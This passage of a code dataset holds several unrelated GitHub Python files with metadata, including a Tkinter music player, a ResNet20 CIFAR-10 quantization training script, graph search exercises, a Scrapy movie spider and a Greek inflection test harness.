if os.path.exists(album_art_path):\n album_art = Image.open(album_art_path)\n album_art.thumbnail((100, 100)) # Resize the image\n album_art_photo = ImageTk.PhotoImage(album_art)\n album_art_label.config(image=album_art_photo)\n album_art_label.image = album_art_photo\n else:\n album_art_label.config(image=None) # Clear the image\n\n\n# Get a list of audio files in the \"Music\" directory\naudio_files = [f for f in os.listdir(music_directory) if f.endswith((\".mp3\", \".wav\"))]\n\n# Initialize the index of the current audio file\ncurrent_audio_index = 0\n\n# Directory to save album art images\nalbum_art_output_directory = \"album_art\"\nif not os.path.exists(album_art_output_directory):\n os.makedirs(album_art_output_directory)\n\n# Create a main window\nroot = tk.Tk()\nroot.title(\"Music Widget\")\n\n# Create a frame for the music widget with a custom background color\nmusic_widget_frame = tk.Frame(\n root, width=300, height=250, relief=\"solid\", bd=2, padx=20, pady=20, bg=\"#2b2b2b\"\n)\nmusic_widget_frame.pack(padx=20, pady=20)\n\n# Create a frame for song information\nsong_info_frame = tk.Frame(music_widget_frame, bg=\"#3a3a3a\")\nsong_info_frame.pack(pady=10)\n\n# Create labels to display song information\nsong_name_label = tk.Label(\n song_info_frame, text=\"\", font=(\"Arial\", 12), bg=\"#3a3a3a\", fg=\"#ffffff\"\n)\nsong_name_label.pack()\nartist_label = tk.Label(\n song_info_frame, text=\"\", font=(\"Arial\", 12), bg=\"#3a3a3a\", fg=\"#ffffff\"\n)\nartist_label.pack()\nalbum_label = tk.Label(\n song_info_frame, text=\"\", font=(\"Arial\", 12), bg=\"#3a3a3a\", fg=\"#ffffff\"\n)\nalbum_label.pack()\n\n# Create a label for album art (initialize it to None)\nalbum_art_label = tk.Label(song_info_frame, image=None, bg=\"#3a3a3a\")\nalbum_art_label.pack()\n\n# Create icons for buttons\nplay_icon = PhotoImage(file=\"play.png\")\npause_icon = PhotoImage(file=\"pause.png\")\nstop_icon = PhotoImage(file=\"stop.png\")\nnext_icon = PhotoImage(file=\"next.png\")\n\n# Create custom styles for buttons\nbutton_style = {\n \"bg\": \"#3a3a3a\", # Background color\n \"fg\": \"#ffffff\", # Text color\n \"relief\": \"flat\", # Border style\n \"font\": (\"Arial\", 12),\n}\n\n# Add buttons with custom styles\nplay_button = tk.Button(\n music_widget_frame,\n image=play_icon,\n command=lambda: play_audio(\n os.path.join(music_directory, 
audio_files[current_audio_index])\n    ),\n    **button_style,\n)\nplay_button.pack(side=\"left\", padx=5)\npause_button = tk.Button(\n    music_widget_frame, image=pause_icon, command=pause_audio, **button_style\n)\npause_button.pack(side=\"left\", padx=5)\nstop_button = tk.Button(\n    music_widget_frame, image=stop_icon, command=stop_audio, **button_style\n)\nstop_button.pack(side=\"left\", padx=5)\nnext_button = tk.Button(\n    music_widget_frame, image=next_icon, command=play_next_audio, **button_style\n)\nnext_button.pack(side=\"left\", padx=5)\n\n# Play the first audio file\nplay_audio(os.path.join(music_directory, audio_files[current_audio_index]))\n\n# Start the Tkinter main loop\nroot.mainloop()\n","repo_name":"dino1537/learningpython","sub_path":"music_widget/music_widget1.py","file_name":"music_widget1.py","file_ext":"py","file_size_in_byte":6923,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"70044253289","text":"#! python3\nfrom Ex02 import *\n\"\"\"\nExercise 03:\nQuestion: Given an integer n, write a program that creates a dictionary containing (i, i*i) for the integers from 1 to n (including both 1 and n), then prints this dictionary.\nExample: If n is 8, the output is: {1: 1, 2: 4, 3: 9, 4: 16, 5: 25, 6: 36, 7: 49, 8: 64}.\n\"\"\"\n\n\ndef createDictPowOfNumber(n):\n    if n <= 0:\n        return dict()\n    resultDict = {}\n    for num in range(1, n + 1):\n        resultDict[num] = num * num\n    return resultDict\n\n\ndef main():\n    n = int(input(\"Enter n: \"))\n    dictN = createDictPowOfNumber(n)\n    print(dictN)\n\n\ndef test():\n    emptyDict = dict()\n    number8Dict = {1: 1, 2: 4, 3: 9, 4: 16, 5: 25, 6: 36, 7: 49, 8: 64}\n    assert(createDictPowOfNumber(8) == number8Dict)\n    assert(createDictPowOfNumber(0) == emptyDict)\n    print(\"unit test success.\")\n\n\nif __name__ == \"__main__\":\n    test()\n    main()\n","repo_name":"mrbug2020/PyLearn_100PythonExercises","sub_path":"resolve-exercises/Ex03.py","file_name":"Ex03.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"vi","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"29979120579","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.contrib.auth.models import AbstractUser, User\nfrom django.db import models\nfrom users.models import CustomUser\nfrom companies.models import Company\n\n\nclass Subscribe(models.Model):\n    name = models.CharField(verbose_name=\"Name of person\",\n                             max_length=255, null=True, blank=False)\n    email = models.EmailField(verbose_name=\"Email address\",\n                              max_length=255, null=True, blank=False)\n    owner = models.ForeignKey(\n        'users.customuser', related_name='owners', on_delete=models.CASCADE, null=True)\n    created = models.DateTimeField(auto_now_add=True)\n\n    class Meta:\n        ordering = ('created',)\n\n    def __str__(self):\n        return str(self.name) + \" at \" + str(self.created)\n","repo_name":"pawank/analytixjobs","sub_path":"analytixworld/frontend/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"14631801774","text":"import torch\nimport torchvision\nfrom artemis.fileman.local_dir import get_local_dir, get_local_path\nfrom artemis.general.display import CaptureStdOut\n\nfrom sacred import Experiment\nfrom tensorboardX import SummaryWriter\n\nfrom torch.optim.lr_scheduler import LambdaLR, ReduceLROnPlateau\nfrom torch.utils.data import Subset\nfrom torchvision import datasets, 
transforms\nimport os\nimport sys\nimport numpy as np\nimport torch.nn.functional as F\nimport gc\n\n\nfrom experiments.train_loops import train_epoch, test, plot_weights\nfrom models.resnet_cifar import resnet20\n\n\n\nfrom utils.hooks import TBHook\nfrom utils.logging_utils import get_experiment_dir, write_error_trace\n\nfrom utils.train_utils import save_state\n\n\n\nex = Experiment(\"Resnet20_Cifar10_MPDNN_U3_LOGparam_l1e-3\")\n\nDEBUG_MODE = getattr(sys, 'gettrace', None)() is not None\n\n\n@ex.capture\ndef get_data(train_batch_size, test_batch_size):\n kwargs = {'num_workers': 0, 'pin_memory': True} if torch.cuda.is_available() and not DEBUG_MODE else {} # tried 3 workers, check memory\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n #transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n # transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # from yerlan idelbayev code , this seems to be for imagenet dataset!!!!!!! WTF !!!!!!????? # okay, pretrained fp model was trained with these values, but quantized model will be trained with correct normalization values!!\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n # transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n # transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # from yerlan idelbayev code\n ])\n\n trainset = torchvision.datasets.CIFAR10(get_local_dir(\"data/cifar10\"), train=True, download=True, transform=transform_train)\n valset = torchvision.datasets.CIFAR10(get_local_dir(\"data/cifar10\"), train=True, download=False, transform=transform_test)\n testset = torchvision.datasets.CIFAR10(get_local_dir(\"data/cifar10\"), train=False, download=False, transform=transform_test)\n\n num_train = len(trainset)\n indices = list(range(num_train))\n train_idx, valid_idx = indices[:45000], indices[45000:]\n val_dataset = Subset(valset, valid_idx)\n train_dataset = Subset(trainset, train_idx)\n\n trainloader = torch.utils.data.DataLoader(train_dataset, batch_size=train_batch_size, shuffle=True, **kwargs)\n valloader = torch.utils.data.DataLoader(val_dataset, batch_size=test_batch_size, shuffle=False, **kwargs)\n testloader = torch.utils.data.DataLoader(testset, batch_size=test_batch_size, shuffle=False, **kwargs)\n return trainloader, valloader, testloader\n\n\n@ex.capture\ndef get_data_train_test(train_batch_size, test_batch_size):\n kwargs = {'num_workers': 0, 'pin_memory': True} if torch.cuda.is_available() and not DEBUG_MODE else {} # tried 3 workers\n transform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])\n\n trainset = torchvision.datasets.CIFAR10(get_local_dir(\"data/cifar10\"), train=True, download=True, transform=transform_train)\n testset = torchvision.datasets.CIFAR10(get_local_dir(\"data/cifar10\"), train=False, download=False, transform=transform_test)\n\n\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=train_batch_size, shuffle=True, **kwargs)\n testloader = 
torch.utils.data.DataLoader(testset, batch_size=test_batch_size, shuffle=False, **kwargs)\n\n\n return trainloader, testloader\n\n\n\n\n\n@ex.capture\ndef get_model(quantize_activations, quantize_weights, use_batchnorm, model, memory_weights_constraints_flag, lambda_memory_weights_loss, memory_weights_constraints):\n\n if model == \"resnet20\":\n net = resnet20(use_batchnorm=use_batchnorm,\n quantize_weights=quantize_weights, quantize_activations=quantize_activations,\n memory_weights_constraints_flag = memory_weights_constraints_flag,\n lambda_memory_weights_loss = lambda_memory_weights_loss,\n memory_weights_constraints = memory_weights_constraints)\n else:\n raise ValueError(\"Model {} not known\".format(model))\n\n return net\n\n\n@ex.config\ndef config():\n train_batch_size = 128\n test_batch_size = 128\n\n lr = 0.01\n epochs = 170 # 100\n log_interval = 100\n restore_path = None \n pretrain_path = None # use this if you want to init with pretrained FP model\n\n use_batchnorm = True\n\n quantize_activations = False\n quantize_weights = True\n\n\n act_fn = \"relu\"\n model = \"resnet20\" # \"resnet20\"\n schedule = \"resnet\" # learning rate scheduler\n\n memory_weights_constraints_flag = True\n lambda_memory_weights_loss = 0.001\n memory_weights_constraints = 70.\n\n\n\n\n\n@ex.capture\ndef get_loss_criterion():\n\n def loss_criterion(output, target):\n return F.cross_entropy(output, target), output\n\n return loss_criterion\n\n\n@ex.capture\ndef get_lr_scheduler(lr, schedule, optimizer):\n if schedule == \"plateau\":\n return ReduceLROnPlateau(optimizer, 'max', factor=0.9, patience=1, verbose=True, min_lr=0.001 * lr)\n\n elif schedule == \"resnet\":\n def _schedule(epoch):\n if epoch >= 80 and epoch < 120:\n mul = 0.1\n elif epoch >= 120:\n mul = 0.01\n else:\n mul = 1.0\n return mul\n return LambdaLR(optimizer, lr_lambda=_schedule)\n\n elif schedule == 'no':\n def _schedule(epoch):\n mul = 1.0\n return mul\n\n return LambdaLR(optimizer, lr_lambda=_schedule)\n\n else:\n raise NotImplementedError('ERROR LR scheduler')\n\n\n@ex.capture\ndef configure_starting_point(lr, quantize_weights, quantize_activations, restore_path, pretrain_path, model):\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n ####################################\n # pretrain path : init. a model with pretrained FP model\n # restore path : load model trained with mpdnn and load parameters of the optimizer as well\n\n ####################################\n\n\n if restore_path is not None:\n\n\n\n print(\"==> Resuming from Checkpoint...\")\n\n if torch.cuda.is_available():\n checkpoint = torch.load(restore_path)\n else:\n checkpoint = torch.load(restore_path, map_location='cpu')\n\n\n _model = {k[7:] if 'module.' in k else k: v for k, v in checkpoint[\"model\"].items() }\n\n\n\n #############################################\n\n try:\n model.load_state_dict(_model)\n except RuntimeError as e:\n\n model_dict = model.state_dict()\n\n # 1. filter out unnecessary keys\n pretrained_dict = {k: v for k, v in _model.items() if k in model_dict and 'scale_premultiplier' not in k}\n # 2. overwrite entries in the existing state dict\n model_dict.update(pretrained_dict)\n # 3. 
load the new state dict\n model.load_state_dict(model_dict)\n\n #############################################\n\n\n model = model.to(device)\n\n\n ###################################\n flag_restore = True\n if flag_restore:\n optimizer = torch.optim.SGD(model.parameters(), lr=checkpoint['optimizer']['param_groups'][0]['lr'], momentum = 0.9)\n optimizer.load_state_dict(checkpoint['optimizer'])\n else:\n optimizer = torch.optim.SGD(model.parameters(), lr=lr, momentum = 0.9)\n optimizer.load_state_dict(checkpoint['optimizer'])\n ###################################\n\n\n epoch, best_val_acc, best_val_epoch = checkpoint[\"epoch\"], checkpoint[\"best_val_acc\"], checkpoint[\"best_epoch\"]\n start_epoch = epoch + 1\n\n\n else:\n initialized_activation_quantizers = False\n need_to_initialize_activations = True\n if pretrain_path is not None:\n # strict = True\n print(\"==> Loading Pretrained Network\")\n\n if torch.cuda.is_available():\n state = torch.load(pretrain_path)\n else:\n state = torch.load(pretrain_path, map_location='cpu')\n\n\n # _optimizer = state[\"optimizer\"]\n if pretrain_path.endswith(\".pt\"):\n _model = {k[7:] if 'module.' in k else k: v for k, v in state[\"model\"].items()}\n elif pretrain_path.endswith(\".th\"):\n _model = {k[7:] if 'module.' in k else k: v for k, v in state['state_dict'].items()}\n\n #############################################\n try:\n model.load_state_dict(_model)\n except RuntimeError as e:\n\n model_dict = model.state_dict()\n # 1. filter out unnecessary keys\n pretrained_dict = {k: v for k, v in _model.items() if\n k in model_dict and 'scale_premultiplier' not in k}\n # 2. overwrite entries in the existing state dict\n model_dict.update(pretrained_dict)\n # 3. load the new state dict\n model.load_state_dict(model_dict)\n #############################################\n model = model.to(device)\n print(\"==> Starting from pretrained Model\")\n\n # init weight and activ quant\n\n model = model.to(device)\n\n\n\n optimizer = torch.optim.SGD(model.parameters(), lr=lr, momentum = 0.9)# , weight_decay = 0.0002) # weight decay for the baseline\n\n # optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\n start_epoch = 0\n best_val_acc = -np.inf\n best_val_epoch = 0\n\n\n return model, optimizer, best_val_acc, start_epoch, best_val_epoch\n\n\n@ex.automain\ndef cifar10(epochs, log_interval, pretrain_path, restore_path, use_batchnorm, quantize_activations, quantize_weights, _seed, _run):\n\n print('get_local_dir', get_local_dir(\"data/cifar10\"))\n\n assert (pretrain_path is None) + (restore_path is None) > 0, \"Only pretrain_path or restore_path\"\n\n exp_dir = get_experiment_dir(ex.path, _run)\n\n print(\"Starting Experiment in {}\".format(exp_dir))\n with CaptureStdOut(log_file_path=os.path.join(exp_dir, \"output.txt\") if not False else os.path.join(exp_dir, \"val_output.txt\")):\n try:\n # Data\n train_loader, test_loader = get_data_train_test()\n\n\n # Model\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = get_model()\n\n # Configure\n\n model, optimizer, best_val_acc, start_epoch, best_val_epoch = configure_starting_point(model=model)\n model = model.to(device)\n\n # Misc\n train_writer = SummaryWriter(log_dir=exp_dir)\n hooks = TBHook(model, train_writer, start_epoch * len(train_loader), torch.cuda.device_count(), log_interval)\n\n\n scheduler = get_lr_scheduler(optimizer=optimizer)\n\n\n\n\n gc.collect()\n model = torch.nn.DataParallel(model)\n gc.collect()\n\n best_epoch = 0\n best_val_acc = -np.inf\n criterion = 
get_loss_criterion()\n\n\n\n\n if torch.cuda.is_available():\n _, test_acc = test(model, test_loader)\n print('Test acc before training ', test_acc)\n\n\n\n\n ##########################################################################################\n start_epoch = 0\n val_list = []\n for epoch in range(start_epoch, start_epoch + epochs + 1):\n\n ##########################################################################################\n\n print('EPOCH: ', epoch)\n\n ##########################################################################################\n print('Training')\n train_loss, train_acc = train_epoch(model=model, train_loader=train_loader, optimizer=optimizer, epoch=epoch, train_writer=train_writer,\n log_interval=log_interval, criterion=criterion)\n ##########################################################################################\n\n\n\n train_loss_eval, train_acc_eval = test(model, train_loader)\n train_writer.add_scalar(\"Validation/TrainLoss\", train_loss_eval, epoch * len(train_loader))\n train_writer.add_scalar(\"Validation/TrainAccuracy\", train_acc_eval, epoch * len(train_loader))\n print(\"Epoch {}, Training Eval Loss: {:.4f}, Training Eval Acc: {:.4f}\".format(epoch, train_loss_eval, train_acc_eval))\n\n\n val_loss, val_acc = test(model, test_loader)\n\n ##########################################################################################\n\n\n try:\n scheduler.step(epoch = epoch)\n except TypeError:\n scheduler.step()\n\n ##########################################################################################\n\n train_writer.add_scalar(\"Validation/Loss\", val_loss, epoch * len(train_loader))\n train_writer.add_scalar(\"Validation/Accuracy\", val_acc, epoch * len(train_loader))\n train_writer.add_scalar(\"Others/LearningRate\", optimizer.param_groups[0][\"lr\"], epoch * len(train_loader))\n if val_acc > best_val_acc:\n best_val_acc = val_acc\n best_epoch = epoch\n save_state(model=model.state_dict(), optimizer=optimizer.state_dict(), epoch=epoch, best_val_acc=best_val_acc, best_epoch=best_epoch,\n save_path=os.path.join(exp_dir, \"best_model.pt\"))\n print(\"Epoch {}, Validation Loss: {:.4f},\\033[1m Validation Acc: {:.4f}\\033[0m , Best Val Acc: {:.4f} at EP {}\".format(epoch, val_loss,\n val_acc,\n best_val_acc,\n best_epoch))\n\n # saving the last model\n save_state(model=model.state_dict(), optimizer=optimizer.state_dict(), epoch=epoch, best_val_acc=best_val_acc, best_epoch=best_epoch,\n save_path=os.path.join(exp_dir, \"model.pt\"))\n\n\n # save all models, print real bops\n folder_to_save = 'mpdnn_models'\n if not os.path.exists(folder_to_save):\n os.makedirs(folder_to_save)\n\n\n name_to_save = 'model_'+str(epoch)+'.pt'\n print('Epoch: ', epoch)\n print('Val ACC ', val_acc)\n if epoch % 5 == 0:\n print('Plot weights')\n plot_weights(model, epoch)\n print('Saving a model ')\n save_state(model=model.state_dict(), optimizer=optimizer.state_dict(), epoch=epoch,\n best_val_acc=best_val_acc, best_epoch=best_epoch,\n save_path=folder_to_save+'/'+name_to_save)\n\n\n\n\n \n print(\"Early Stopping Epoch {} with Val Acc {:.4f} \".format(best_epoch, best_val_acc))\n\n except Exception:\n write_error_trace(exp_dir)\n raise\n","repo_name":"vovamedentsiy/mpdnn","sub_path":"resnet20_cifar10.py","file_name":"resnet20_cifar10.py","file_ext":"py","file_size_in_byte":16173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9114934468","text":"\nimport sys\nfrom collections import deque\n\ndef dfs(x):\n 
checked[x]=1\n    print(x, end=\" \")\n    for i in graph[x]:\n        if (checked[i]==0):\n            dfs(i)\n\ndef bfs(x):\n    queue=deque()\n    checked[x]=1\n    queue.append(x)\n    \n    while queue:\n        y=queue.popleft()\n        print(y, end=\" \")\n        for i in graph[y]:\n            if(checked[i]==0):\n                checked[i]=1\n                queue.append(i)\n\n\nn, m, v = map(int, sys.stdin.readline().split())\ngraph = [[] for _ in range(n+1)]\nchecked = [0] * (n + 1)\n\n# Build the adjacency list\nfor _ in range(m):\n    a, b = map(int, sys.stdin.readline().split())\n    graph[a].append(b)\n    graph[b].append(a)\n\n# Sort each adjacency list so neighbors are visited in ascending order\nfor i in range(1, n+1):\n    graph[i].sort()\n\ndfs(v)\n# Reset the visited array\nchecked = [0] * (n + 1)\nprint()\nbfs(v)","repo_name":"aeong98/algorithm","sub_path":"백준/그래프/DFS와 BFS.py","file_name":"DFS와 BFS.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"9892317616","text":"import multiprocessing\nimport os\nimport pickle\nimport random\n\nimport numpy as np\nimport torch.nn.functional as F\nimport torch.optim\nimport torch.utils.data\n\nfrom learning.model import load_net, save_net, capture_state, path\nfrom protocol import SnowballProtocol\n\nVERBOSE = True\nDISCOUNT = .99\n\n\ndef get_samples(proto, take_percent=.01):\n    state, sender, action, value = [], [], [], []\n\n    proto.reset()\n    done = False\n\n    if VERBOSE:\n        print(\"Start simulation\")\n        print(proto.snowball_map)\n\n    while not done:\n        # Save only 1% of the sample to avoid bias\n        save = random.uniform(0, 1) < take_percent\n\n        if save:\n            s = capture_state(proto)\n\n        done = proto.step()\n\n        if save:\n            info = proto.history[-1]\n\n            if info['votes'] is not None:\n                f = s[info['from']]\n\n                part_id, votes = info['q_participants'], info['votes']\n\n                for pid, v in zip(part_id, votes):\n                    if proto.participant_objects[pid].adversary:\n                        state.append(s)\n                        sender.append(f)\n                        action.append(v)\n                        value.append(proto.iteration)\n\n        if VERBOSE and proto.iteration % 10000 == 0:\n            print(proto.iteration)\n\n    last_it = proto.iteration\n    for i in range(len(value)):\n        n = last_it - value[i] + 1\n        value[i] = (1 - DISCOUNT ** n) / (1 - DISCOUNT)\n\n    return state, sender, action, np.array(value, dtype=np.float32)\n\n\ndef train(args):\n    states, sender, action, value = [], [], [], []\n    with open(os.path.join(path('dataset'), f'supervised-{args.adversary_strategy}.pkl'), 'rb') as f:\n        num_sim = 0\n        while True:\n            try:\n                states_x, sender_x, action_x, value_x = pickle.load(f)\n                num_sim += 1\n                states.extend(states_x)\n                sender.extend(sender_x)\n                action.extend(action_x)\n                value.extend(value_x)\n            except EOFError:\n                print(\"Number of simulations loaded:\", num_sim)\n                print(\"Dataset entries:\", len(states))\n                break\n\n    states = torch.Tensor(states)\n    dataset = torch.utils.data.DataLoader(list(zip(states, sender, action, value)), batch_size=32, shuffle=True)\n\n    device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n    print(\"Device:\", device)\n\n    net = load_net(f'supervised-{args.adversary_strategy}')\n    net.to(device)\n\n    optim = torch.optim.Adam(net.parameters())\n\n    for epoch in range(args.num_epochs):\n        for s, f, a, v in dataset:\n            s = s.to(device)\n            f = f.to(device)\n            vp, ap = net(s, f)\n\n            # value_loss = F.mse_loss(vp, v.unsqueeze(1))\n            a = a.to(device)\n            action_loss = F.cross_entropy(ap, a)\n\n            # loss = action_loss + value_loss\n\n            optim.zero_grad()\n            action_loss.backward()\n            optim.step()\n\n        print(\"Action loss:\", action_loss.cpu().data.numpy())\n        # print(loss, value_loss, action_loss)\n\n    save_net(net, 
f'supervised-{args.adversary_strategy}')\n\n\ndef create_dataset(args):\n def build(tasks, lock, count):\n for _ in iter(tasks.get, '<>'):\n args.record = True\n proto = SnowballProtocol(args)\n\n states, sender, action, value = get_samples(proto)\n\n lock.acquire()\n\n if not os.path.exists(path('dataset')):\n os.mkdir(path('dataset'))\n\n count.value += 1\n\n print(\"Saving simulation: \", count.value)\n with open(os.path.join(path('dataset'), f'supervised-{args.adversary_strategy}.pkl'), 'ab') as f:\n pickle.dump((states, sender, action, value), f)\n\n lock.release()\n\n num_process = multiprocessing.cpu_count()\n print(\"Number of cores:\", num_process)\n tasks = multiprocessing.Queue()\n [tasks.put(None) for _ in range(20)]\n [tasks.put('<>') for _ in range(num_process)]\n\n lock = multiprocessing.Lock()\n count = multiprocessing.Value('i', 0)\n\n for i in range(num_process):\n multiprocessing.Process(target=build, args=(tasks, lock, count)).start()\n","repo_name":"SkidanovAlex/snowball","sub_path":"snowball/learning/supervised.py","file_name":"supervised.py","file_ext":"py","file_size_in_byte":4242,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"53"} +{"seq_id":"38733034314","text":"import yaml\n\nfrom accent import strip_length\n\nfrom greek_inflexion import GreekInflexion\n\n\ndef output_detail(detail):\n print(\" -\")\n\n if \"stem\" in detail:\n print(\" stem: {}\".format(detail[\"stem\"]))\n\n if \"stemming\" in detail:\n print(\" stemming:\")\n print(\" base: {}\".format(detail[\"stemming\"][\"base\"]))\n print(\" ending: {}\".format(\n detail[\"stemming\"][\"ending\"]))\n print(\" rule: \\\"{0.a}|{0.b}>{0.c}<{0.d}|{0.e}\\\"\".format(\n detail[\"stemming\"][\"rule\"]))\n print(\" used_default: {}\".format(\n detail[\"stemming\"][\"used_default\"]))\n\n if \"original_form\" in detail:\n print(\" original_form: {}\".format(detail[\"original_form\"]))\n if \"accent_notes\" in detail:\n print(\" accent_notes: {}\".format(detail[\"accent_notes\"]))\n\n if \"override\" in detail:\n print(\" override: {}\".format(detail[\"override\"]))\n\n\ndef output_item(\n lemma, segmented_lemma, key, part, form, line, stem,\n possible_stems, likely_stems, possible_parses, generated, correct):\n print()\n print(\"-\")\n print(\" form: {}\".format(form))\n print(\" correct: \\\"{}/{} {}\\\"\".format(\n len(generated), form.count(\"/\") + 1, correct))\n print(\" generated:\")\n for generated_form in generated.keys():\n print(f\" - {generated_form}\")\n print()\n print(\" lemma: {}\".format(lemma))\n if segmented_lemma:\n print(\" segmented_lemma: {}\".format(segmented_lemma))\n print(\" key: {}\".format(key))\n print(\" part: {}\".format(part))\n if line:\n print(\" line: {}\".format(line))\n print()\n\n if stem:\n if len(stem) == 1:\n print(\" stem: {}\".format(list(stem)[0]))\n else:\n print(\" stem: {}\".format(list(stem)))\n\n if likely_stems:\n print(\" likely_stems:\")\n for likely_stem in sorted(likely_stems):\n print(\" {}: {}\".format(*likely_stem))\n\n if possible_stems:\n print(\" possible_stems:\")\n for possible_stem in sorted(possible_stems):\n print(\" - {} {} # {}\".format(*possible_stem))\n\n if possible_parses:\n print(\" possible_parses:\")\n for guess in sorted(possible_parses):\n print(\" - {}\".format(guess))\n\n if generated:\n print(\" generated:\")\n\n for generated_form, details in generated.items():\n print(\" -\")\n print(\" form: {}\".format(generated_form))\n print(\" details:\")\n for detail in details:\n 
output_detail(detail)\n\n\ndef test_generate(\n        stemming_file, lexicon_file, test_file,\n        global_tags=None, debug=False\n):\n    \"\"\"\n    generates all the forms in the test_file using the lexicon_file and\n    stemming_file and outputs any discrepancies (or everything if debug on)\n    \"\"\"\n\n    ginflexion = GreekInflexion(stemming_file, lexicon_file)\n\n    with open(test_file) as f:\n        for test in yaml.safe_load(f):\n            source = test.pop(\"source\", None)\n            test.pop(\"test_length\", False)\n            lemma = test.pop(\"lemma\")\n            tags = set(test.pop(\"tags\", []))\n            if source:\n                tags.update({source})\n            if global_tags:\n                tags.update(global_tags)\n\n            segmented_lemma = ginflexion.segmented_lemmas.get(lemma)\n            for key, form in sorted(test.items()):\n                stem = ginflexion.find_stems(lemma, key, tags)\n                generated = ginflexion.generate(lemma, key, tags)\n\n                if stem:\n                    stem_guess = None\n                else:\n                    stem_guess = [\n                        stem for key, stem in\n                        ginflexion.possible_stems(form, \"^\" + key + \"$\")]\n\n                if [strip_length(w) for w in sorted(generated)] == \\\n                        [strip_length(w) for w in sorted(form.split(\"/\"))]:\n                    correct = \"✓\"\n                else:\n                    correct = \"✕\"\n                if debug or correct == \"✕\":\n                    output_item(\n                        lemma, segmented_lemma, key, None, form, None, stem,\n                        stem_guess, None, None, generated, correct)\n","repo_name":"jtauber/greek-inflexion","sub_path":"test_generate.py","file_name":"test_generate.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"53"}
{"seq_id":"30939386022","text":"#\n# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy import Request\nimport json\nimport re\n# from pprint import pprint\n\n\nclass MoviesSpider(scrapy.Spider):\n    BASE_URL = 'https://movie.douban.com/j/search_subjects?type=movie&tag=%s&sort=recommend&page_limit=%s&page_start=%s'\n    MOVIE_TAG = '豆瓣高分'\n    PAGE_LIMIT = 20\n    page_start = 0\n\n    name = 'movies'\n    start_urls = [BASE_URL % (MOVIE_TAG, PAGE_LIMIT, page_start)]\n\n    def parse(self, response):\n        # Parse the response body with the json module\n        infos = json.loads(response.body.decode('utf-8'))\n\n        # Iterate over the list of movie info entries\n        for movie_info in infos['subjects']:\n            movie_item = {}\n\n            # Extract the title and rating and fill them into the item\n\n            # Extract the movie page url, build and send a Request, and pass the item to the movie page parser via the meta argument\n            yield Request(movie_info['url'], callback=self.parse_movie, meta={'_movie_item': movie_item})\n\n        # If the json result holds fewer movies than requested, there are no movies left; otherwise keep searching\n        if len(infos['subjects']) == self.PAGE_LIMIT:\n            self.page_start += self.PAGE_LIMIT\n            url = self.BASE_URL % (self.MOVIE_TAG, self.PAGE_LIMIT, self.page_start)\n            yield Request(url)\n\n    def parse_movie(self, response):\n        # Take the item (already holding the title and rating) out of meta\n        movie_item = response.meta['_movie_item']\n\n        # Get the whole info string\n        info = response.css('div#info').xpath('string(.)').extract_first()\n\n        # Extract all field names\n        fields = [s.strip().replace(':', '') for s in response.css('div#info span.pl::text').extract()]\n\n        # Extract the values of all fields\n        values = [re.sub('\\s+', '', s.strip()) for s in re.split('\\s*(?:%s):\\s*' % '|'.join(fields), info)][1:]\n\n        # Fill all the info into the item\n        movie_item.update(dict(zip(fields, values)))\n\n        yield movie_item","repo_name":"Rockyzsu/ScrapyBook","sub_path":"douban_movie/douban_movie/spiders/douban.py","file_name":"douban.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"zh","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"}
{"seq_id":"26097127844","text":"from pages.AgendaPage import AgendaPage\nfrom behave import *\nimport time\n\n\n@when(u'Filtrar por nombre agenda, organismo y servicio \"{Agenda}\" \"{organismo}\" 
